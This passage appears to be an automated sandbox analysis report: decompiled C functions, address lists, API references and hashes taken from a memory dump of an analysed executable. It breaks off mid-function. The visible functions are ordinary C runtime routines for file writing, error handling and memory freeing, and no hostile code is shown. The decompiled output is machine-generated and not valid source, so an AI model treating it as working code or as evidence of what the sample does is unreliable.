					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x417158 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x416768)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x416768)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E00409670( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E0040C6AC(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E00407C7F(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E00406936(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0040C4ED( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0040C4ED();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00401C35(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

0x0040a8ea
0x0040a8f1
0x0040a8f4
0x0040a8f9
0x0040a901
0x0040a904
0x0040a908
0x0040a90b
0x0040a915
0x0040a91f
0x0040a921
0x0040a924
0x0040a927
0x0040a92d
0x0040a92f
0x0040a936
0x0040a943
0x0040a944
0x0040a947
0x0040a94a
0x0040a94b
0x0040a94c
0x0040a94f
0x0040a954
0x0040ac60
0x0040ac60
0x0040a95a
0x0040a95a
0x0040a95d
0x0040a95f
0x0040a965
0x0040a968
0x0040a96f
0x0040a976
0x0040a97f
0x00000000
0x00000000
0x0040a985
0x0040a98b
0x0040a98d
0x0040a98f
0x0040a992
0x0040a997
0x0040a99b
0x00000000
0x00000000
0x00000000
0x0040a99b
0x0040a9a0
0x0040a9a3
0x0040a9a5
0x0040a9aa
0x0040aa5c
0x0040aa5d
0x0040aa60
0x0040aa62
0x0040ac10
0x0040ac12
0x00000000
0x0040ac14
0x0040ac14
0x0040ac17
0x0040ac1a
0x0040ac23
0x0040ac26
0x0040ac27
0x0040ac2b
0x0040ac2e
0x0040ac2e
0x00000000
0x0040ac32
0x0040aa68
0x0040aa68
0x0040aa6d
0x0040aa70
0x0040aa76
0x0040aa7c
0x0040aa85
0x0040aa88
0x0040aa88
0x0040aa89
0x0040aa8a
0x0040aa8d
0x0040aa8e
0x00000000
0x0040aa8e
0x0040a9b0
0x0040a9bf
0x0040a9c0
0x0040a9c3
0x0040a9c5
0x0040a9ca
0x0040abdb
0x0040abdd
0x0040abdf
0x0040abe2
0x0040abe7
0x0040abf0
0x0040abf3
0x0040abf4
0x0040abf8
0x0040abfb
0x0040abfe
0x0040abfe
0x0040ac02
0x0040ac02
0x0040ac02
0x0040ac05
0x0040ac05
0x0040ac05
0x0040ac07
0x0040ac07
0x0040ac0b
0x0040a9d0
0x0040a9d0
0x0040a9d4
0x0040a9d6
0x0040a9d9
0x0040a9dc
0x0040a9e0
0x0040a9e1
0x0040a9e5
0x0040a9e5
0x0040a9e8
0x0040a9ed
0x0040a9f9
0x0040a9fe
0x0040aa01
0x0040aa01
0x0040aa06
0x0040aa08
0x0040aa0b
0x0040aa0d
0x0040aa10
0x0040aa13
0x0040aa16
0x0040aa1e
0x0040aa22
0x0040aa26
0x0040aa26
0x0040aa2c
0x0040aa32
0x0040aa35
0x0040aa3d
0x0040aa44
0x0040aa48
0x0040aa49
0x0040aa4c
0x0040aa4d
0x0040aa91
0x0040aa91
0x0040aa95
0x0040aa96
0x0040aa9b
0x0040aaa1
0x00000000
0x0040aaa7
0x0040aaab
0x0040ab34
0x0040ab3b
0x0040ab43
0x0040ab4b
0x0040ab50
0x0040ab53
0x0040ab58
0x00000000
0x0040ab5e
0x0040ab73
0x0040ac57
0x0040ac5d
0x00000000
0x0040ab79
0x0040ab82
0x0040ab84
0x0040ab8a
0x00000000
0x0040ab90
0x0040ab94
0x0040abca
0x0040abcd
0x00000000
0x0040abd3
0x0040abd3
0x00000000
0x0040abd3
0x0040ab96
0x0040ab98
0x0040ab9a
0x0040abb3
0x00000000
0x0040abb9
0x0040abbd
0x00000000
0x0040abc3
0x0040abc3
0x0040abc6
0x0040abc7
0x00000000
0x0040abc7
0x0040abbd
0x0040abb3
0x0040ab94
0x0040ab8a
0x0040ab73
0x0040ab58
0x0040aaa1
0x0040a9ca
0x00000000
0x0040aab2
0x0040aab2
0x0040aab5
0x0040aab9
0x0040aabc
0x0040aade
0x0040aae1
0x0040aae6
0x0040aaea
0x0040aaee
0x0040ab1c
0x0040ab1e
0x00000000
0x0040aaf0
0x0040aaf0
0x0040aaf3
0x0040aaf6
0x0040aaf9
0x0040ac34
0x0040ac37
0x0040ac3a
0x0040ac44
0x0040ac4f
0x0040ac54
0x00000000
0x0040aaff
0x0040ab06
0x0040ab0b
0x0040ab0e
0x0040ab11
0x00000000
0x0040ab17
0x0040ab17
0x00000000
0x0040ab17
0x0040ab11
0x0040aaf9
0x0040aabe
0x0040aac2
0x0040aac5
0x0040aaca
0x0040aad0
0x0040aad2
0x0040aad9
0x0040ab1f
0x0040ab22
0x0040ab23
0x0040ab28
0x0040ab2b
0x0040ab2e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ab2e
0x00000000
0x0040aabc
0x0040a95d
0x0040ac63
0x0040ac63
0x0040ac65
0x0040ac68
0x0040ac68
0x0040ac68
0x0040ac68
0x0040ac7a
0x0040ac7c
0x0040ac7d
0x0040ac7e
0x0040ac88

APIs

GetConsoleCP.KERNEL32 ref: 0040A927
__fassign.LIBCMT ref: 0040AB06
__fassign.LIBCMT ref: 0040AB23
WriteFile.KERNEL32(?,00406488,00000000,?,00000000), ref: 0040AB6B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040ABAB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040AC57

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 1204cc5d9a0eb02ce752479c0d8753b461032648df41855e190a65d87a6b8acd
Instruction ID: ac575513e1e51b0f3f0aaae7f1722e2331a20e17e6081957bed3ca193d280fb4
Opcode Fuzzy Hash: 1204cc5d9a0eb02ce752479c0d8753b461032648df41855e190a65d87a6b8acd
Instruction Fuzzy Hash: C1D1DB70E042489FDB15CFE8C8809EEBBB5BF48304F29416AE855BB381D234AD56CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004042F1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004042F1(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x416024 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00409F0C(_t13,  *0x416024);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00409F47(_t14,  *0x416024, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00409E8B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00409F47(_t18,  *0x416024, 0);
								} else {
									_t8 = E00409F47(_t18,  *0x416024, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0040439F(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x004042f1
0x004042f8
0x0040430b
0x00404312
0x00404314
0x00404318
0x00404331
0x00404331
0x0040431a
0x0040431c
0x0040432f
0x00404336
0x0040433f
0x00404342
0x00404345
0x00404359
0x00404359
0x00404362
0x00404347
0x0040434e
0x00404354
0x00404357
0x0040436b
0x0040436d
0x00000000
0x00000000
0x00000000
0x00404357
0x00404370
0x00000000
0x00000000
0x00000000
0x0040432f
0x0040431c
0x00404378
0x00404382
0x004042fa
0x004042fc
0x004042fc

APIs

GetLastError.KERNEL32(?,?,004042E8,00401E18,004019A5), ref: 004042FF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040430D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00404326
SetLastError.KERNEL32(00000000,004042E8,00401E18,004019A5), ref: 00404378

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2cf4d03c717006603613014055ed4f675f45cb557d1681b64b72138fc843da04
Instruction ID: 7f179c978d6e8454f63642bf347055dea5aac0a428f61dd6acbd727ed4218179
Opcode Fuzzy Hash: 2cf4d03c717006603613014055ed4f675f45cb557d1681b64b72138fc843da04
Instruction Fuzzy Hash: EA01B57270A2125ED62567B5AC8556B2FE4DB85778721423FFB20E41E1EB398C01514C

Uniqueness

Uniqueness Score: -1.00%

Function 00402471 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00402471(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x418000(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00402477
0x0040247b
0x00402486
0x0040248e
0x00402499
0x0040249f
0x004024a3
0x004024aa
0x004024b0
0x004024b0
0x004024b2
0x004024b7
0x00000000
0x004024bc
0x004024c3

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 00402486
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 00402499
FreeLibrary.KERNEL32(00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 004024BC

Strings

mscoree.dll, xrefs: 0040247F
CorExitProcess, xrefs: 00402491

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 626555efc224bdb1bad64bac0d9527dc28404f6cd5792023940cdd3c72578110
Instruction ID: 9f67a5e104d30bcb1b26a24a34ec6484246661ca9c3d763845df77eea0d21c27
Opcode Fuzzy Hash: 626555efc224bdb1bad64bac0d9527dc28404f6cd5792023940cdd3c72578110
Instruction Fuzzy Hash: BBF0FE31A10619FBDB129B51DE0DBDEBA79AB44756F108075E805A11E0CBB88E40DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004067B1 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004067B1(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x416708; // 0x416758
					if(_t23 != 0) {
						E00405BB5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x41670c; // 0x4173a0
					if(_t24 != 0) {
						E00405BB5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x416710; // 0x4173a0
					if(_t25 != 0) {
						E00405BB5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x416738; // 0x41675c
					if(_t26 != 0) {
						E00405BB5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x41673c; // 0x4173a4
					if(_t27 != 0) {
						return E00405BB5(_t6);
					}
				}
				return _t6;
			}

0x004067b7
0x004067bc
0x004067c0
0x004067c6
0x004067c9
0x004067ce
0x004067d2
0x004067d8
0x004067db
0x004067e0
0x004067e4
0x004067ea
0x004067ed
0x004067f2
0x004067f6
0x004067fc
0x004067ff
0x00406804
0x00406805
0x00406808
0x0040680e
0x00000000
0x00406816
0x0040680e
0x00406819

APIs

_free.LIBCMT ref: 004067C9

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 004067DB
_free.LIBCMT ref: 004067ED
_free.LIBCMT ref: 004067FF
_free.LIBCMT ref: 00406811

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80122fae68721bce9a2f66b55e03fd57467376553dfd7fd007525a1624bb2066
Instruction ID: 889dcc508e08d98f5f743580ea195f14572a9fb5800363ce21ab533a1115f212
Opcode Fuzzy Hash: 80122fae68721bce9a2f66b55e03fd57467376553dfd7fd007525a1624bb2066
Instruction Fuzzy Hash: D6F03C32505600A7DA21EB69E4C2C5773F9EA40718766887AF415E77C0DA78FC808E6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A68C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040A68C(signed int _a4, void* _a8, signed int _a12) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				void* _t58;
				signed int _t66;
				signed int _t69;
				intOrPtr _t70;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t82;
				signed int _t85;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				void* _t112;

				_t95 = _a12;
				_t58 = _a8;
				_v8 = _t58;
				_v20 = _t95;
				_t108 = _a4;
				if(_t95 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t116 = _t58;
				if(_t58 != 0) {
					_t101 = _t108 >> 6;
					_t104 = (_t108 & 0x0000003f) * 0x38;
					_v12 = _t101;
					_t102 =  *((intOrPtr*)(0x417158 + _t101 * 4));
					_v16 = _t104;
					_t92 =  *((intOrPtr*)(_t102 + _t104 + 0x29));
					__eflags = _t92 - 2;
					if(_t92 == 2) {
						L6:
						__eflags =  !_t95 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						L7:
						__eflags =  *(_t102 + _t104 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E00409BFF(_t108, 0, 0, 2);
							_t112 = _t112 + 0x10;
						}
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t69 = E0040A86E(_t102, __eflags, _t108);
						__eflags = _t69;
						if(_t69 == 0) {
							_t97 = _v12;
							_t103 = _v16;
							_t70 =  *((intOrPtr*)(0x417158 + _t97 * 4));
							__eflags =  *((char*)(_t70 + _t103 + 0x28));
							if( *((char*)(_t70 + _t103 + 0x28)) >= 0) {
								_t93 = _v8;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t73 = WriteFile( *(_t70 + _t103 + 0x18), _t93, _v20,  &_v40, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									_v44 = GetLastError();
								}
								goto L26;
							}
							_t93 = _v8;
							_t82 = _t92;
							__eflags = _t82;
							if(_t82 == 0) {
								E0040ACF1( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							_t85 = _t82 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_t84 = E0040AEB5( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L28;
							}
							_t84 = E0040ADCC( &_v44, _t108, _t93, _v20);
							goto L15;
						} else {
							__eflags = _t92;
							if(__eflags == 0) {
								_t93 = _v8;
								_t84 = E0040A8DF(__eflags,  &_v44, _t108, _t93, _v20);
								L15:
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								L27:
								_t97 = _v12;
								_t103 = _v16;
								L28:
								_t74 = _v28;
								__eflags = _t74;
								if(_t74 != 0) {
									return _t74 - _v24;
								}
								_t76 = _v32;
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  *( *((intOrPtr*)(0x417158 + _t97 * 4)) + _t103 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E004065F6(__eflags))) = 0x1c;
										_t66 = E00406609(__eflags);
										 *_t66 =  *_t66 & 0x00000000;
										L3:
										return _t66 | 0xffffffff;
									}
									__eflags =  *_t93 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t110 = 5;
								__eflags = _t76 - _t110;
								if(__eflags != 0) {
									_t66 = E0040661C(_t76);
								} else {
									 *((intOrPtr*)(E004065F6(__eflags))) = 9;
									_t66 = E00406609(__eflags);
									 *_t66 = _t110;
								}
								goto L3;
							}
							__eflags = _t92 - 1 - 1;
							_t93 = _v8;
							if(_t92 - 1 > 1) {
								goto L27;
							}
							E0040AC89( &_v44, _t93, _v20);
							goto L13;
						}
					}
					__eflags = _t92 - 1;
					if(_t92 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *(E00406609(_t116)) =  *_t64 & 0x00000000;
				 *((intOrPtr*)(E004065F6( *_t64))) = 0x16;
				_t66 = E00405C88();
				goto L3;
			}

0x0040a694
0x0040a697
0x0040a69a
0x0040a69d
0x0040a6a2
0x0040a6a8
0x0040a867
0x0040a867
0x00000000
0x0040a867
0x0040a6ae
0x0040a6b0
0x0040a6d6
0x0040a6dc
0x0040a6df
0x0040a6e2
0x0040a6e9
0x0040a6ec
0x0040a6f0
0x0040a6f3
0x0040a6fa
0x0040a6fe
0x0040a700
0x00000000
0x00000000
0x0040a702
0x0040a702
0x0040a707
0x0040a710
0x0040a715
0x0040a715
0x0040a71d
0x0040a71f
0x0040a720
0x0040a721
0x0040a727
0x0040a729
0x0040a76a
0x0040a76d
0x0040a770
0x0040a777
0x0040a77c
0x0040a7ca
0x0040a7cf
0x0040a7d2
0x0040a7d3
0x0040a7dd
0x0040a7e3
0x0040a7e5
0x0040a7ed
0x0040a7ed
0x00000000
0x0040a7f0
0x0040a781
0x0040a784
0x0040a784
0x0040a787
0x0040a7bc
0x00000000
0x0040a7bc
0x0040a789
0x0040a789
0x0040a78c
0x0040a7ac
0x00000000
0x0040a7ac
0x0040a78e
0x0040a791
0x00000000
0x00000000
0x0040a79c
0x00000000
0x0040a72b
0x0040a72b
0x0040a72d
0x0040a757
0x0040a760
0x0040a765
0x0040a74d
0x0040a7f3
0x0040a7f6
0x0040a7f7
0x0040a7f8
0x0040a7f9
0x0040a7f9
0x0040a7fc
0x0040a7ff
0x0040a7ff
0x0040a802
0x0040a804
0x00000000
0x0040a862
0x0040a806
0x0040a809
0x0040a80b
0x0040a83e
0x0040a843
0x0040a84a
0x0040a84f
0x0040a855
0x0040a85a
0x0040a6ca
0x00000000
0x0040a6ca
0x0040a845
0x0040a848
0x00000000
0x00000000
0x00000000
0x0040a848
0x0040a80f
0x0040a810
0x0040a812
0x0040a82c
0x0040a814
0x0040a819
0x0040a81f
0x0040a824
0x0040a824
0x00000000
0x0040a812
0x0040a731
0x0040a734
0x0040a737
0x00000000
0x00000000
0x0040a745
0x00000000
0x0040a74a
0x0040a729
0x0040a6f5
0x0040a6f8
0x00000000
0x00000000
0x00000000
0x0040a6f8
0x0040a6b2
0x0040a6b7
0x0040a6bf
0x0040a6c5
0x00000000

APIs

Part of subcall function 0040A8DF: GetConsoleCP.KERNEL32 ref: 0040A927

WriteFile.KERNEL32(?,00000000,00406374,?,00000000), ref: 0040A7DD
GetLastError.KERNEL32 ref: 0040A7E7
__dosmaperr.LIBCMT ref: 0040A82C

Strings

tc@, xrefs: 0040A68E

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: tc@
API String ID: 251514795-2494914666
Opcode ID: b987decbba39891d74781a38a4ea2db11a54a22ffd1a21a3dd236c37fa384e78
Instruction ID: cd9d284c9c5dac6d88946d789ca62f1d70c7d666ffa63a704383a7b1ada9dddc
Opcode Fuzzy Hash: b987decbba39891d74781a38a4ea2db11a54a22ffd1a21a3dd236c37fa384e78
Instruction Fuzzy Hash: 6251D571900309AFEB10ABA5C885BEFB7B9EF05314F088437E400BB2D2D679DD51976A

Uniqueness

Uniqueness Score: -1.00%

Function 004027C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004027C8(void* __edx, intOrPtr _a4) {
				signed int _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				WCHAR* _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				WCHAR* _t25;
				WCHAR** _t35;
				struct HINSTANCE__* _t36;
				WCHAR* _t39;
				WCHAR* _t41;
				WCHAR* _t42;
				intOrPtr* _t43;
				WCHAR** _t44;
				intOrPtr _t47;
				WCHAR* _t48;
				WCHAR* _t54;
				void* _t57;
				WCHAR** _t58;
				WCHAR* _t64;
				WCHAR* _t66;

				_t57 = __edx;
				_pop(_t67);
				_t47 = _a4;
				if(_t47 != 0) {
					__eflags = _t47 - 2;
					if(_t47 == 2) {
						L6:
						GetModuleFileNameW(0, 0x416c68, 0x104);
						_t25 =  *0x416c48; // 0x2519d8
